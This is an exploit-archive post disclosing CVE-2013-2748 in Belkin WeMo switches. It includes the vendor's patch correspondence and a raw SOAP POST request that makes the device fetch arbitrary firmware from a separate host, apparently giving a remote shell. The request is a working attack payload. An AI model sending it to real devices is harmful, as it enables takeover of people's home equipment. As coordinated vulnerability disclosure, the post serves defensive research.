Home / exploitsPDF  

Belkin Wemo Arbitrary Firmware Upload

Posted on 09 April 2013

# Exploit Title: Belkin Wemo Arbitrary Firmware Vulnerability
# Date: 4/3/13
# Exploit Author: Daniel Buentello
# Vendor Homepage: http://www.belkin.com/us/wemo
# Version: Any version prior to WeMo_US_2.00.2176.PVT
# CVE : CVE-2013-2748

Hello
Im independently working with Mitre and Belkin on this matter so please
disregard my naiveness. Several months ago I discovered a vulnerablility on
the Belkin WeMo light switch would allow arbitrary firmware to uploaded
resulting in remote shell access.
Here is a youtube link to a PoC video I made:
https://www.youtube.com/watch?v=BcW2q0aHOFo

I was finally able to reach Belkin and worked with them on patching the
vulnerability. I recently heard back from them and here is the
correspondence:

Daniel,
The FW for WeMo Switch and Sensor with the security fixes for some of the
issues you notified us about have shipped. The updated FW version is
WeMo_US_2.00.2176.PVT and WeMo_WW_2.00.2176.PVT (worldwide version). I
didn't register for CVE's for the vulns you found, as the process wasn't
clear for companies outside tier 1 (Microsoft, Oracle, Apple, Adobe) type
companies. We are still working on a credit page for White Hat submissions
and it will probably be a few months out.

I reached out to Mitre and they assigned me a CVE and recommended I submit
my code here. Here is the code which would allow someone to upload their
own firmware:

POST /upnp/control/firmwareupdate1 HTTP/1.1
SOAPACTION: "urn:Belkin:service:firmwareupdate:1#UpdateFirmware"
Content-Length:
Content-Type: text/xml; charset="utf-8"
HOST: 10.0.1.8:49153
User-Agent:

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <s:Body>
 <u:UpdateFirmware xmlns:u="urn:Belkin:service:firmwareupdate:1">

 <ReleaseDate>07Jan2013</ReleaseDate><NewFirmwareVersion>1</NewFirmwareVersion><URL>
http://10.0.1.99/bad_firmware.bin<http://10.0.1.99/WeMo_US_2.00.1821.PVT_SNS.bin.gpg%3C/URL%3E%3CSignature%3Ea053469a3efe2bd5e396104ac1ef5b0e%3C/Signature%3E>
 </u:UpdateFirmware>
 </s:Body>
</s:Envelope>

Mitre needs the vulnerability documented on an external site in order to
add the entry into the CVE database. If needed I can forward you the PGP
signed message from them. If you need anything else feel free to ask. I
have copies of all correspondence between Belkin., Mitre, and myself.

 

TOP

Malware :

Exploits :